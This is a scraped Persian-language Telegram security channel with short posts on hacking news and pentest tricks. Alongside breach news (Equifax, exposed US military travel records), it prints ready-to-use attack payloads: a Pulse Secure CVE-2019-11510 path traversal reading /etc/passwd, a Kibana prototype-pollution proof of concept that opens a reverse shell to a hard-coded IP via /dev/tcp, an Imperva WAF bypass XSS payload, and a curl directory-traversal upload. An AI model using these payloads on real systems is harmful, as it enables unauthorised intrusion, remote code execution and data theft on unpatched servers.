امنیت اطلاعات
847 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
امنیت اطلاعات
Pulse Connect Secure versions 9.0RX, 8.3RX, and 8.2RX arbitrary file disclosure CVE-2019-11510 exploit: /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ https://www.exploit-db.com/exploits/47297 #pulse #vpn…
بیش از 14500 سرور Pulse secure در برابر اکسپلویت CVE-2019-11510 آسیب پذیر هستند.

ده کشور اول در این خصوص در تصویر قابل مشاهده است.

نکته جالب، آسیب پذیر بودن سازمان های نظامی و دولتی و شرکت های بزرگ می باشد.



https://badpackets.net/over-14500-pulse-secure-vpn-endpoints-vulnerable-to-cve-2019-11510/



#pulse
#news
#usa


@sec_nerd
#fun

بخاطر رتبه بهتر در مسابقات تفنگ آب پاش مدرسه رو هک کرده!

@sec_nerd
کپچاها دارن از کنترل خارج میشن!

#wtf
#fun


@sec_nerd
POC: kibana < 6.6.0

.es(*).props(label.__proto
.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//')
.props(label.proto.env.NODE_OPTIONS='--require /proc/self/environ')__


https://slides.com/securitymb/prototype-pollution-in-kibana/#/58


#kibana
#elasticsearch
#nosql
#rce


@sec_nerd
امنیت اطلاعات
دیتابیس سایت امریکایی equifax برای فروش در دارکنت قرار داده شده! قیمت : 600 بیت کوین! #news #breach #equifax
طبق شکایتی که از سوی سهامداران شرکت equifax تنظیم شده است مشخص شد این شرکت از نام کاربری و پسورد admin:admin برای دسترسی به پنل مدیریت پورتال حساسی استفاده میکرده است که این ضعف به هکرها کمک کرده است ضمن نفوذ به سرور و سرقت داده های کاربران، کلیدهای رمزگشایی پسوردهای رمزنگاری شده را نیز بدست آورند.


https://finance.yahoo.com/news/equifax-password-username-admin-lawsuit-201118316.html


#news
#equifax
#usa
#breach


@sec_nerd
Imperva WAF Bypass for XSS;

<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];">

- without parentheses, 'alert', 'document.domain' , 'window' , space




#waf
#web
#pentest



@sec_nerd
آسیب پذیری جدیدی از نوع RCE در php-fpm کشف شده است

https://bugs.php.net/bug.php?id=78599

و با وجود پچ شدن آن به تازگی، سرور های آسیب پذیر فراوانی با ترکیب nginx و php یافت میشوند

اکسپلویت:
https://github.com/neex/phuip-fpizdam


#php
#nginx
#rce


@sec_nerd
نحوه اکسپلویت کردن آسیب پذیری Directory Traversal با استفاده از curl


curl -F "file=@PentesterLab
.jsp;filename=../../../../../../../../hacker.jsp"



#terminal
#web
#tricks


@sec_nerd
جمع آوری زیردامنه های وبسایت با استفاده از ابزاری که از api وبسایت whoxy.com بهره میبرد

https://github.com/gwen001/pentest-tools/blob/master/domain-finder.py


برای راه اندازی این ابزار نیاز به کلید api از این وبسایت دارید که ثبت نام در آن نیز رایگان می باشد.



#web
#bugbounty
#subdomain


@sec_nerd
۱۷۹ گیگابایت از اطلاعات کارکنان ارتش امریکا بر روی یک سرور ابری آمازون بصورت محافظت نشده قرار داشت.
این دیتابیس متعلق به سیستم رزرو مسافرت های این افراد است که متعلق به AutoClerk است.
این اطلاعات شامل نام، تاریخ تولد، آدرس، شماره تلفن، تاریخ و هزینه سفر و همچنین جزییاتی از کارت اعتباری بوده است.


https://securityboulevard.com/2019/10/sensitive-us-government-and-military-travel-details-left-exposed-online/


#news
#breach
#usa


@sec_nerd